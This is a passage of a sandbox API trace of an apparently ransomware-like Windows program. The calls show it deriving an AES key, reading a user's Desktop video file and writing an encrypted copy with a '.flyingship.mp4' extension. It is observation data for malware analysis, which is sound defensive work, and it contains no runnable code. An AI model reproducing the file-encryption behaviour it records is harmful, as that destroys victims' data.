wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.874] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0167.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.874] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.875] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.875] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0167.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.875] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.875] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.875] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0167.875] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.875] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0167.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.877] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.877] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0167.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.877] CryptDestroyHash (hHash=0x90af58) returned 1 [0167.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.877] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.877] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.877] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.877] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\urmveyqgrc9wpf_wa.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0167.879] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.879] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0167.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0167.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0167.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0167.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0167.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0167.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.879] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0167.880] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0167.880] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0167.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0167.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0167.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0167.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0167.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0167.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0167.882] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0167.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0167.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0167.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0167.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0167.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0167.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0167.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.flyingship.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\urmveyqgrc9wpf_wa.flyingship.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0167.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0167.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0167.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0167.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0167.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0167.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0167.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0167.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0167.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0167.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0167.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0167.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0167.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0167.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0167.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0167.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0167.886] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0167.886] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.889] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x828a, lpOverlapped=0x0) returned 1 [0167.889] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0167.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0167.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1828a) returned 0x9e5190 [0167.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0167.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0167.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0167.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1828a) returned 0x9fd428 [0167.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0167.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.893] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0167.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0167.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0167.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1828a) returned 0x9e5190 [0167.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0167.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0167.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.893] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0167.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0167.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0167.893] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.894] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0167.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1828a) returned 0x9e5190 [0167.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0167.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0167.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: 